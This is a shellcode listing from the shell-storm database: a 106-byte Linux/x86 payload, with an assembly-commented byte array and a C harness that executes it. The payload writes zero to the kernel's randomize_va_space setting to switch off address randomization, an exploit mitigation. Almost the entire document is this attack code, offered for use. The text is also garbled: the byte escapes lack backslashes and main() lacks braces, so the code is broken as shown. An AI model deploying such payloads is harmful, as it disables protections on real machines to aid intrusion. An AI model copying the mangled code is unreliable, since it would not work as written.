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# Title : Linux/x86 - Disable randomize stack addresse - 106 bytes
# Published : 2010-05-25
# Author : Jonathan Salwan
# Previous Title : Solaris/x86 - Remote Download file - 79 bytes
# Next Title : Solaris/x86 - Reboot() - 37 bytes

Title:	 Linux/x86 - Disable randomize stack addresse - 106 bytes
         (Set randomize_va_space to zero) 
Author:  Jonathan Salwan <submit (!) shell-storm.org>
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm

!Database of Shellcodes http://www.shell-storm.org/shellcode/

Date:	 2010-05-25
Tested:  Linux 2.6.33 - i686

! You need root euid

#include <stdio.h>

char sc[] = "x31xdb"                // xor    %ebx,%ebx
            "x6ax61"                // push   $0x61
            "x89xe3"                // mov    %esp,%ebx
            "xb0x0a"                // mov    $0xa,%al
            "xcdx80"                // int    $0x80
            "x31xdb"                // xor    %ebx,%ebx
            "x6ax65"                // push   $0x65
            "x66x68x61x63"        // pushw  $0x6361
            "x68x61x5fx73x70"    // push   $0x70735f61
            "x68x7ax65x5fx76"    // push   $0x765f657a
            "x68x64x6fx6dx69"    // push   $0x696d6f64
            "x68x2fx72x61x6e"    // push   $0x6e61722f
            "x68x72x6ex65x6c"    // push   $0x6c656e72
            "x68x73x2fx6bx65"    // push   $0x656b2f73
            "x68x63x2fx73x79"    // push   $0x79732f63
            "x68x2fx70x72x6f"    // push   $0x6f72702f
            "x89xe3"                // mov    %esp,%ebx
            "x30xc0"                // xor    %al,%al
            "xb0x11"                // mov    $0x11,%al
            "x31xc9"                // xor    %ecx,%ecx
            "x66xb9x41x04"        // mov    $0x441,%cx
            "x31xd2"                // xor    %edx,%edx
            "x66xbaxa4x01"        // mov    $0x1a4,%dx
            "x31xc0"                // xor    %eax,%eax
            "xb0x05"                // mov    $0x5,%al
            "xcdx80"                // int    $0x80
            "x89xc3"                // mov    %eax,%ebx
            "x31xc9"                // xor    %ecx,%ecx
            "x66x68x30x0a"        // pushw  $0xa30
            "x89xe1"                // mov    %esp,%ecx
            "x31xd2"                // xor    %edx,%edx
            "xb2x02"                // mov    $0x2,%dl
            "x31xc0"                // xor    %eax,%eax
            "xb0x04"                // mov    $0x4,%al
            "xcdx80"                // int    $0x80
            "xb0x01"                // mov    $0x1,%al
            "xcdx80";               // int    $0x80

int main(void)
        fprintf(stdout,"Length: %dn",strlen(sc));
        (*(void(*)()) sc)();

return 0;